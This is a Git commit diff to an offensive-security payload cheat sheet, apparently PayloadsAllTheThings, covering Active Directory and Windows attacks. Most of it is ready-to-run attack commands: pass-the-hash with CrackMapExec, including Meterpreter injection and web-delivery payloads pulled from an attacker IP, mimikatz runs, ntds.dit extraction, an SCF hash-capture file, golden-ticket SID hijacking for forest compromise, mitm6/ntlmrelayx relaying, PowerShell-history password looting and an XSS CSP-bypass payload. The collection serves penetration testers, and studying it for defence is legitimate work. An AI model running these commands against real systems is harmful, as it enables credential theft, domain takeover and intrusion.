mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
SID history break trust + Powershell history + SCF files
This commit is contained in:
parent
6fecedd880
commit
f6d5221a85
@ -26,10 +26,13 @@
|
|||||||
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||||
* [SMB Signing Disabled](#smb-signing-disabled)
|
* [SMB Signing Disabled](#smb-signing-disabled)
|
||||||
* [Drop the MIC](#drop-the-mic)
|
* [Drop the MIC](#drop-the-mic)
|
||||||
|
* [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
|
||||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
|
* [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
* [Unconstrained delegation](#unconstrained-delegation)
|
* [Unconstrained delegation](#unconstrained-delegation)
|
||||||
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
||||||
|
* [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||||
* [PrivExchange attack](#privexchange-attack)
|
* [PrivExchange attack](#privexchange-attack)
|
||||||
* [Password spraying](#password-spraying)
|
* [Password spraying](#password-spraying)
|
||||||
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
|
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
|
||||||
@ -64,13 +67,14 @@
|
|||||||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||||
crackmapexec smb -L
|
crackmapexec smb -L
|
||||||
crackmapexec smb -M name_module -o VAR=DATA
|
crackmapexec smb -M name_module -o VAR=DATA
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
|
crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||||
|
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
|
||||||
crackmapexec mimikatz --server http --server-port 80
|
crackmapexec mimikatz --server http --server-port 80
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -365,6 +369,14 @@ dir c:\exfil
|
|||||||
reg.exe save hklm\system c:\exfil\system.bak
|
reg.exe save hklm\system c:\exfil\system.bak
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Using esentutl.exe
|
||||||
|
|
||||||
|
Copy/extract a locked file such as the AD Database
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||||
|
```
|
||||||
|
|
||||||
#### Extract hashes from ntds.dit
|
#### Extract hashes from ntds.dit
|
||||||
|
|
||||||
then you need to use secretsdump to extract the hashes
|
then you need to use secretsdump to extract the hashes
|
||||||
@ -557,6 +569,9 @@ Mitigations:
|
|||||||
|
|
||||||
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
- Accounts have to have **DONT_REQ_PREAUTH**
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||||
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
||||||
@ -766,6 +781,19 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
|
|||||||
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### SCF file attack against writeable share
|
||||||
|
|
||||||
|
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
[Shell]
|
||||||
|
Command=2
|
||||||
|
IconFile=\\10.10.XX.XX\Share\test.ico
|
||||||
|
[Taskbar]
|
||||||
|
Command=ToggleDesktop
|
||||||
|
```
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec
|
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec
|
||||||
@ -795,6 +823,25 @@ SourceName TargetName TrustType TrustDirection
|
|||||||
domainA.local domainB.local TreeRoot Bidirectional
|
domainA.local domainB.local TreeRoot Bidirectional
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Child Domain to Forest Compromise - SID Hijacking
|
||||||
|
|
||||||
|
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
|
||||||
|
By default the first domain created if the Forest Root.
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
- KRBTGT Hash
|
||||||
|
|
||||||
|
- Find the SID of the domain
|
||||||
|
```powershell
|
||||||
|
$ Convert-NameToSid target.domain.com\krbtgt
|
||||||
|
S-1-5-21-2941561648-383941485-1389968811-502
|
||||||
|
```
|
||||||
|
- Replace 502 with 519 to represent Enterprise Admins
|
||||||
|
- Create golden ticket and attack parent domain.
|
||||||
|
```powershell
|
||||||
|
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
||||||
|
```
|
||||||
|
|
||||||
### Unconstrained delegation
|
### Unconstrained delegation
|
||||||
|
|
||||||
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||||
@ -930,6 +977,23 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||||||
[+] Ticket successfully imported!
|
[+] Ticket successfully imported!
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Relay delegation with mitm6
|
||||||
|
|
||||||
|
Prerequisites:
|
||||||
|
- IPv6 enabled (Windows prefers IPV6 over IPv4)
|
||||||
|
- LDAP over TLS (LDAPS)
|
||||||
|
|
||||||
|
> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/fox-it/mitm6.git
|
||||||
|
cd /opt/tools/mitm6
|
||||||
|
pip install .
|
||||||
|
|
||||||
|
mitm6 -hw ws02 -d lab.local --ignore-nofqnd
|
||||||
|
ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
|
||||||
|
then use rubeus with s4u to relay the delegation
|
||||||
|
```
|
||||||
|
|
||||||
### PrivExchange attack
|
### PrivExchange attack
|
||||||
|
|
||||||
@ -979,6 +1043,14 @@ Alternatively you can use the Metasploit module
|
|||||||
|
|
||||||
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
|
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
|
||||||
|
|
||||||
|
Alternatively you can use an all-in-one tool : Exchange2domain.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone github.com/Ridter/Exchange2domain
|
||||||
|
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
|
||||||
|
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
|
||||||
|
```
|
||||||
|
|
||||||
### Password spraying
|
### Password spraying
|
||||||
|
|
||||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
||||||
@ -1189,4 +1261,5 @@ Navigate to any web application that is integrated with our AAD domain. Once at
|
|||||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||||
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
||||||
|
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
@ -7,6 +7,14 @@
|
|||||||
* [User Enumeration](#user-enumeration)
|
* [User Enumeration](#user-enumeration)
|
||||||
* [Network Enumeration](#network-enumeration)
|
* [Network Enumeration](#network-enumeration)
|
||||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||||
|
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||||
|
* [Search for file contents](#search-for-file-contents)
|
||||||
|
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||||
|
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||||
|
* [Passwords in unattend.xml](#passwords-in-unattend.xml)
|
||||||
|
* [Wifi passwords](#wifi-passwords)
|
||||||
|
* [Passwords stored in services](#passwords-stored-in-services)
|
||||||
|
* [Powershell history](#powershell-history)
|
||||||
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
||||||
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
||||||
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
|
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
|
||||||
@ -381,6 +389,13 @@ Invoke-SessionGopher -AllDomain -o
|
|||||||
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Powershell history
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
|
cat (Get-PSReadlineOption).HistorySavePath
|
||||||
|
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
||||||
|
```
|
||||||
|
|
||||||
## EoP - Processes Enumeration and Tasks
|
## EoP - Processes Enumeration and Tasks
|
||||||
|
|
||||||
|
@ -169,6 +169,7 @@ Then log in using xfreerdp
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
|
xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||||
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -932,6 +932,15 @@ Works for CSP like `script-src self`
|
|||||||
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
|
||||||
|
|
||||||
|
Works for CSP like `script-src 'self' data:`
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<script ?/src="data:+,\u0061lert%281%29">/</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
|
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
|
||||||
|
Loading…
Reference in New Issue
Block a user